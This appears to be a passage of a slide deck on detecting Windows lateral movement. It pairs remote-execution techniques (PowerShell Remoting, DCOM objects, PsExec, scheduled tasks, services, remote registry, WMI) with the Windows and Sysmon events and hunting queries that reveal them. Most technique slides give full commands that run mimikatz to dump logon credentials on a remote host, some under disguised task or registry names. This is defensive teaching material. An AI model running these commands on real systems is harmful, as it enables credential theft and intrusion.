    Remote execution viaPowershell Remoting • Powershell scripts • Powershell Invoke-Command cmdlet: • powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • powershell Invoke-Command -ComputerName pc0002.test.local -credential TESTdadmin -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
  • 17.
    Remote execution viaPowershell Remoting – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts wsmprovhost.exe (Sysmon EID 1) E4. wsmprovhost.exe starts payload file (Sysmon EID 1)
  • 18.
    Remote execution viaPowershell Remoting – the most interesting events
  • 19.
    Remote execution viaMMC20.Application COM How • Programmatically • Using powershell: powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Appli cation','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt','7')}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
  • 20.
    E2. Special privileges assignedto new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts mmc.exe (Sysmon EID 1) E4. mmc.exe starts payload file (Sysmon EID 1) Remote execution via MMC20.Application COM – events sequence on destination side
  • 21.
    Remote execution viaMMC20.Application COM – the most interesting events
  • 22.
    Remote execution viaPsExec (& clones, e.g. PaExec) • PsExex: • psexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit • PaExec: • paexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • ADMIN$ administrative share is enabled on remote host • TCP/445 port is accessible on remote host Requirements & limitations
  • 23.
    E2. Special privileges assignedto new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Copying PSEXESVC.exe to ADMIN$ (Windows EID 5140/5145) E4. psexesvc service is installed and started (Windows EID 7045/7036) Remote execution via PsExec (& clones) – events sequence on destination side E5. psexesvc.exe is started by services.exe (Sysmon EID 1) E6. psexesvc.exe starts payload file (Sysmon EID 1) E7. Interaction with payload stdin/stdout/stderr via SMB pipes (Windows EID 5145)
  • 24.
    Remote execution viaPsExec (& clones) – the most interesting events
  • 25.
    Hunting: search forPsExec (& clones) artifacts – services
  • 26.
    Hunting: search forPsExec (& clones) artifacts – access to pipes
  • 27.
    Remote execution viaPsExec (& clones) – the most interesting events
  • 28.
    Hunting: search forexecutions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)
  • 29.
    Remote execution viaShellWindows COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF- A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
  • 30.
    Remote execution via ShellBrowserWindowCOM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1- 8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Doesn’t work for Windows 7 destination https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
  • 31.
    E2. Special privileges assignedto new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) Remote execution via ShellWindows or ShellBrowserWindow COM – events sequence on destination side E3. explorer.exe starts payload file in current session (Sysmon EID 1)
  • 32.
    Remote execution viavia ShellWindows or ShellBrowserWindow COM – how to detect??? Payload file is executed in the session of the current active user
  • 33.
    Remote execution viaScheduled Tasks • Programmatically • Standard command line tools: • at 172.16.205.14 3:55 C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> win_mimikatz_output.txt • schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:userspublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" How • TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage) • TCP/445 port is accessible on remote host (in case of AT usage) Requirements & limitations
  • 34.
    Remote execution viaScheduled Tasks – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Access to atsvc SMB Pipe (Windows EID 5145) – in case of at.exe usage E6. taskeng.exe starts payload file (Sysmon EID 1) E4. Scheduled task is created or updated (Windows EID 4698/4702) E5. Task is triggered. svchost.exe starts taskeng.exe (Sysmon EID 1) Also there are some interesting event in Microsoft-Windows-TaskScheduler/Operational event log
  • 35.
    Remote execution viaScheduled Tasks – the most interesting events
  • 36.
    Hunting: search forremotely created or updated scheduler tasks
  • 37.
    Remote execution viaScheduled Tasks – the most interesting events
  • 38.
    Hunting: search forATSVC pipe connections
  • 39.
    Remote execution viaServices • Programmatically • Standard command line tool: • sc pc0002 create "Remote service" binPath= "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" sc pc0002 start "Remote service" sc pc0002 delete »Remote service" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
  • 40.
    Remote execution viaServices – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. New service is installed (Windows EID 7045/4697) E4. Start command is sent to installed service. services.exe starts payload file (Sysmon EID 1) E5. A timeout is reached (Windows EID 7009) E6. Failure while trying to start service (Windows EID 7000)
  • 41.
    Remote execution viaServices – the most interesting events
  • 42.
    Hunting: search forremotely created services
  • 43.
    Remote registry How • Programmatically •Using powershell or reg: • reg add pc0002HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey("LocalMachin e", "pc0002"); $key=$reg.OpenSubKey("SOFTWAREMicrosoftWindowsCurrentVersionRu n",$True); $key.SetValue("GoogleUpdater","calc.exe");}" Requirements & limitations • TCP/445 port is accessible on remote host • Remote Registry service is enabled on remote host
  • 44.
    Remote registry –events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WINREG pipe access (Windows EID 5145) E4. Registry value is modified (Windows EID 4657) – if audit and SACL were configured
  • 45.
    Remote Registry –the most interesting events
  • 46.
    Hunting: search forWINREG pipe connections
  • 47.
  • 48.
    Hunting: search forchanges in autostart registry keys
  • 49.
  • 50.
    Remote WMI subscriptionscreation – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured
  • 51.
  • 52.
    Remote WMI subscriptionscreation – the most interesting events